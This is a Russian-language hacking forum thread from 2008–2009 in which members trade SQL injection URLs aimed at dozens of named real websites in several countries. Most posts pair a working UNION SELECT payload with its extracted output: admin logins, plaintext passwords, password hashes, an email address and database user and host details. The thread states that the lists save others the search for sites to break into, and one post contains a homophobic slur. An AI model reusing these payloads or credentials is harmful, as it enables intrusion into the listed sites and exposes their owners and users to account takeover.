Буду первоНахом!
_http://www.gaycentral.ru/news/?id=30' пи*еров в аут!!!!
Отредактировано Abra-Ca-Tab-Ra (2008-09-03 22:37:29)
terminal-s52 |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » terminal-s52 » Хакинг » Выкладываем скули!
Буду первоНахом!
_http://www.gaycentral.ru/news/?id=30' пи*еров в аут!!!!
Отредактировано Abra-Ca-Tab-Ra (2008-09-03 22:37:29)
по подробней можна что такое скули
Скуль, это уязвимость типа My sql-injection с нифильтруемым параметром к примеру _http://www.target.com/index.php?id=1' вот такая уязвимость и есть скуль!
а нафига их выкладывать?
как нафига ты же хочешь к примеру взломать сайт?))...чтоб весь нет не рыть в поисках уязвимых сайтах, вот уже найдены будут sql и с них начинаешь ломать..... :crazy:
вот решил выложить пару sql сразу скажу что ломал давно работают они, я ненаю :crazy:
http://www.statistica.md/news.php?lang=ru&id=-173+UNION+SELECT+1,2,concat_ws(0x3a,USERNAME,PASSWORD),4,5,6,7,8,9,10,11+FROM+adminusers+LIMIT+1,1/*
login-ana
pass-c0ntr0l
.http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7267625f6d656d62657273+LIMIT+1,1/*
name-OzzZZ
password-29123098
http://bid4tackle.com/category.php?cate_id=-13+union+select+1,concat_ws(0x3a,user_name,password),3,4+FROM+admin/*
admin:$1$p4..8//.$Ent39SQht4YHt/NonxSvs0
Отредактировано gangs (2008-09-16 15:25:55)
_http://www.trud.ru/issue/news.php?id=-2493+union+select+1,2,version(),4,5,6,7,8/* так и не смог подобрать таблицы ушел спать
_http://www.ganzara.ru/internet/book%20/media/?id=-999999+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+19,1/*
_http://www.psychasoc.com/print_news.php?ID=-999999+union+select+login,2,3,4,5+from+admin/*
_http://michaelyoun.com/index.php?id=-335+union+select+1,login,3,4,5,6+from+users/*
Отредактировано seven (2008-09-19 06:09:03)
http://trubka.net/showmelodie.php?id=4020'
Тут есть. Тока что дальше хз :dontknow:
http://www.photocs.info/index.php?link=2&id=17
(прежде чем ломать саму статью прочтите на странице =) )
http://www.photocs.info/index.php?link=2&id=17 (прежде чем ломать саму статью прочтите на странице =) )
А лучше ломать и не чего не трогать ! Нафиг кульные сайты портить !
Don't Learn to HACK - HACK to LEARN
Гарин, http://www.photocs.info/index.php?link= … ,4,version(),6/*
а другое не выводит!
хз . я в них не шарю. нашел ошибку, дальше я ничего не делал
Don't Learn to HACK - HACK to LEARN
И это тоже верно !
Вот вам скуль от меня:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,concat_ws(char(58),gmlevel,username,char(58),id,char(58),sha_pass_hash,char(58),sessionkey,char(58),v,char(58),s,char(58),email,char(58),joindate,char(58),last_ip,char(58),failed_logins,char(58),locked,char(58),last_login,char(58),online,char(58),tbc,char(58),mutetime,char(58),%20locale,char(58)),5,6+from+account--
Отредактировано m0rgan (2008-11-07 21:23:35)
В форме авторизации
В Логин подставлял ковычку
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Вот не большой збор скулей от меня:
http://www.tregu-kosovar.com/inseratedetails.php?id=247'+and+1=1+union+all+select+1,2,3,4,5,concat(username,char(58),passwort),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+az_user/*&refid=&lang=
логин/пасс:
leaa:21881
------------------------------------------------
http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login--
логин/пасс:
admin:mbreti
---------------------------------------------
http://www.mycybermedia.com/listo_kategori.php?kategorianr=-9999+union+all+select+1,2,3,4,null,concat_ws(char(58),username,password),7,8,9,10,11,12+from+admin--
логин/пасс:
admin:admin
------------------------------------------
http://www.albauto.com/rallyalbania/galeri_info.php?ida=26+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6+from+editor/*&page=29
логин/пасс:
admin:ee99fafdaf801531af8861addda2603c
--------------------------------------------
http://www.environment.adanet.com.al/tekst.php?idt=16+and+1=2+union+all+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10+from+mysql.user/*
логин/пасс:
root:54c57d3714ca092d
------------------------------------------
http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/*
логин/пасс:
drupal:9536bdcd9e3faa581d6991b5d04ac4ec
-----------------------------------------
http://www.wonpwn.com/games.php?id=-2'+union+select+1,username,3,user_password,5,6,7,8,9,0,1+from+bb2_users+limit+1,1/*
логин/пасс:
JimmyDinner:2e4b43e13698dd4df580f90b76b0de2a
----------------------------------------
http://www.housescreen.be/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
логин/пасс:
frans:9d0aa885d8b6db599231726fd377f739
benny:74d39d16ccd8128184800880e529db76
Eveline:c45817c7a68626d7428e95e3a0dad694
Dsky:7d91594f16e9674749bc1cf3f91752af
Bart:008884c57916bb8fd80421cfed45ac38[CODE] [CODE]test:098f6bcd4621d373cade4e832627b4f6
-------------------------------------------
http://www.ajaxprojects.com/ajax/viewcategory.php?categoryid=-8+union+select+1,2,concat(username,0x3a,0x3a,password,0x3a,email),4,5,6,7+from+user/*
логин/пасс/мыло:
ajax::29062006:ajaxteam@gmail.com
----------------------------------------------
http://www.heimlichinstitute.org/page.php?id=null+UNION+ALL+SELECT+1,convert(concat(user,0x3a,password)+using+latin1),3,4+FROM+mysql.user--
логин/пасс:
root:*C3F44A16E1B0CA7DABAA9587D64AF55B1C7833C4
-----------------------------------------------
http://www.donabauer.at/bookmarks//view_group.php?id=-1+union+select+0,1,concat_ws(0x3a,username,password),3,4,5,6,7+FROM+apb_users--
логин/пасс:
gast:27wvfetVjvcRo
------------------------------------------------
http://www.aesouk.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3,4+from+admin--
логин/пасс:
Categories within admin:$1$p8EHR3eg$brgVoxx0n4udlQ35s2iCo0
-------------------------------------------------
http://www.schuetzenbund.de/shop/list.php?id=-21%27+union+select+1,concat_ws(char(58),name,password),3,4,5,6,7,8,9+from+user/*
логин/пасс:
admin:sh00ting
------------------------------------------------
http://www.solusihukum.com/artikel.php?id=-1+union+select+1,2,concat_ws(0x10,pwd,uid),4,5+from+user/*
логин/пасс:
jingklong:kong
agungjuga:agung
jalil:andy
---------------------------------------------
http://www.tiranatimes.com/newscat.php?id=5+and+1=1+union+all+select+1,concat(username,char(58),password),3,4,5+from+tt_users/*&cat=5
логин/пасс:
GEMA:GEMATT
---------------------------------------------
The End!
АП, вот вам мой севодняшний сбор уязвимостей! Пройдемся по nl.
http://www.nanoshield.nl/productinfo.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8--
версия/юзер/бд:
faq@blade22.geenpunt.nl5.0.32-Debian_7etch8faq
------------------------------------------------------------------
http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3--
версия/юзер/бд:
educos@www03.ip2.net5.0.51educos
------------------------------------------------------------------
http://www.jansiebelink.nl/detail.php?id=-1+union+all+select+concat_ws(version(),user(),database())--
версия/юзер/бд:
haas@10.171.105.65.0.32-Debian_7etch8-logjan
----------------------------------------------------------------
http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:
5053nvha@10.0.1.615.0.51a-3ubuntu5.15053nvha
-----------------------------------------------------------------
http://www.art-innovation.nl/event.php?id=-1+union+all+select+concat_ws(version(),user(),database()),1--
версия/юзер/бд:
artinnovat_main@localhost4.0.23-standard-logartinnovat_main
------------------------------------------------------------------
http://www.tamaynut.nl/newsdetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10,11--
версия/юзер/бд:
tamayn32_tamaynu@localhost4.1.22-standardtamayn32_tamaynut
----------------------------------------------------------------
http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7--
версия/юзер/бд:
trovet_user@localhost5.0.27trovet_data
---------------------------------------------------------------
http://www.26000gezichten.nl/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
версия/юзер/бд:
26000gezichten@localhost4.0.24_Debian-10sarge2-log26000gezichten
--------------------------------------------------------------
http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2--
версия/юзер/бд:
zeelandwon_joom@localhost5.0.51a-community-logzeelandwon_joom
---------------------------------------------------------------
http://www.opdesloep.nl/pages.php?id=-1+union+all+select+0,1,2,convert(concat_ws(version(),user(),database())+using+latin1),4,5--
версия/юзер/бд:
sitesuntrack@localhost4.1.12-standard-logsuntrack
----------------------------------------------------------------------
Добавлено через 1 час 18 минут
Продолжение славного дела:)
http://www.danishdesignwatches.eu/prod_detail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9,10,11,12,13,14,15,16,17--
версия/юзер/бд:
26872admin@10.0.5.615.0.51a-3ubuntu5.126872admin
----------------------------------------------------------
http://www.granietbeurs.nl/website.php?id=-1+union+all+select+convert(concat_ws(version(),user(),database())+using+latin1)--
версия/юзер/бд:
dagranietb_gran@localhost4.1.12-standard-logdagranietb_gran
----------------------------------------------------------
http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7--
версия/юзер/бд:
spsrasd@localhost5.0.58cms
---------------------------------------------------------
http://www.digitaccess.fr/category.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:
digit93@localhost5.0.27digitaccess
--------------------------------------------------------
http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9--
версия/юзер/бд:
my67521@62.193.203.2265.0.32-Debian_7etch6-logmy67521
-------------------------------------------------------
http://www.serema.fr/produit.php?id=-1+union+all+select+0,1,convert(concat_ws(version(),user(),database())+using+latin1),3,4,5,6--
версия/юзер/бд:
смотрим в свойствах картинки:)
serema@localhost4.1.10aserema_fr
--------------------------------------------------
http://www.eliotrope.fr/theme.php?id=-1+union+all+select+0,concat_ws(version(),user(),database())--
версия/юзер/бд:
elio_trope@localhost5.0.32-Debian_7etch8-logeliotrope_base
---------------------------------------------------------
http://www.fetedelamusique.culture.fr/page.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7--
версия/юзер/бд:
musique@euterpe.culture.fr5.0.45-Max-logmusique
--------------------------------------------------------
http://design-facade.fr/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7--
версия/юзер/бд:
designfa@10.0.75.124.0.25-standard-logdesignfa
--------------------------------------------------------
http://www.cshm-schm.ca/fr/event.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:
cshm@localhost5.0.27cshm
Думаю на первое время вам хватит:)
-----------------------------------------------------
The End!
Добавлено через 6 часов 11 минут
Вот небольной сбор багов на конец дня:)
Налетай:)
http://www.v-p-c.fr/article.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--
юзер/версия/бд:
vpc@10.0.70.104.0.25-standard-logvpc :
-------------------------------------------------------------
http://www.fpt-soft.com/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--
юзер/версия/бд:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com
------------------------------------------------------------
по сути тот же проект, только с другим доменным именем:)
http://www.fsoft.com.vn/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--
юзер/версия/бд:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com
-------------------------------------------------------------
http://www.scenarts.fr/fiche_spectacle.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
юзер/версия/бд:
logscenarts-scenarts@10.0.75.615.0.68
-------------------------------------------------------------
http://www.rdsm.be/fr/news.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--
юзер/версия/бд:
reyskensp@192.168.0.165.0.77-0.dotdeb.0reyskensp
----------------------------------------------------------------
http://www.mielapiculteur.fr/faq2.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:
lunedemiel@localhost4.0.18mielapi
-----------------------------------------------------------------
http://www.sitetic.fr/prod_detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:
sitetic-web@localhost4.1.22sitetic
----------------------------------------------------------------
The End!
Добавлено через 45 часов 33 минуты
Вот сново небольшой сбор скулей от меня
На этот раз пройдемся по доменной зоне co.uk!
www.solutionfocusedtrainers.co.uk
PR:2
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6--
Юзер/версия/бд:
dbo197803277@212.227.114.1364.0.27-max-logdb197803277
------------------------------------------------------------------
www.mynhw.co.uk
PR:4
http://www.mynhw.co.uk/news-full.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9--
Юзер/версия/бд:
sniasuper@server213-171-218-159.livedns.org.uk5.0.45SNIA
----------------------------------------------------------------
www.ccsrecruitment.co.uk
PR:1
http://www.ccsrecruitment.co.uk/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9--
Юзер/версия/бд:
logccsunix_jobs-ccsunix_rishi@web7.myhsphere.cc5.0.67
----------------------------------------------------------------
www.judgement-productions.co.uk
PR:4
http://www.judgement-productions.co.uk/show.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database())--
Юзер/версия/бд:
judgement1@213.171.218.1375.0.22-logjudgement1
------------------------------------------------------------
www.c8imc.co.uk
PR:1
http://www.c8imc.co.uk/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5--
Юзер/версия/бд:
mainimc@localhost4.1.19-standard-logmainimc
---------------------------------------------------------
www.positivestepstraining.co.uk
PR:2
http://www.positivestepstraining.co.uk/website.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,concat_ws(version(),user(),database())--
Юзер/версия/бд:
evolvenetroottwo@server213-171-192-98.livedns.org.uk5.0.45evolvenetmainsqltwo
---------------------------------------------------------------------
Вот самый интерестный!!!!11111
www.vogueescorts.co.uk
PR:1
http://www.vogueescorts.co.uk/main.php?id=-255+union+select+1,2,3--
Ну вот как обычно небольшой сбор
Налетай
http://www.apslaquila.it/event.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2--
версия/юзер/бд:
5.0.22:apslaquila@localhost:apslaquila
-----------------------------------------------------------------------
http://www.motortribe.it/news_view.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:
5.0.22:mt_user@lnx6653:I-DEAS_motortribe
--------------------------------------------------------------------
http://www.alessandrastocchino.it/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database())--
версия/юзер/бд:
log:Sql85634@62.149.141.41:Sql85634_1
------------------------------------------------------------------
http://www.gurtenapotheke.ch/product.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database()),1--
версия/юзер/бд:
4.1.25:gurtenap@localhost:gurtenap_data
-------------------------------------------------------------------
http://www.codexflores.ch/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--
версия/юзер/бд:
5.0.45:root@localhost:codexflores
----------------------------------------------------------------------
http://www.marchanzeiger.ch/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
версия/юзер/бд:
4.0.24_Debian-10sarge1:marchanzeiger@localhost:marchanzeiger 3
---------------------------------------------------------------------
http://www.klassiker-garage.ch/show.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--
версия/юзер/бд:
4.1.22-standard:web373@localhost:usr_web373_1
-------------------------------------------------------------------
http://www.spitalzollikerberg.ch/download.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,version(),user(),database())--
версия/юзер/бд:
5.0.32-Debian_7etch8:root@localhost:cms24
---------------------------------------------------------------------
http://www.palatina.ch/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--
версия/юзер/бд:
4.1.18-standard:dabumpimpa_pa@localhost:dabumpimpa_palatina
------------------------------------------------------------------
http://www.theofficepub.at/event.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
версия/юзер/бд:
5.0.77-1-log:jist@localhost:jistTheOfficePub
---------------------------------------------------------------------
The End!
Отредактировано bug1z (2009-03-05 15:51:20)
Man-SQL-inj v2.2 by Elekt Введение | Кодинг | 2008-07-03 |
Вы здесь » terminal-s52 » Хакинг » Выкладываем скули!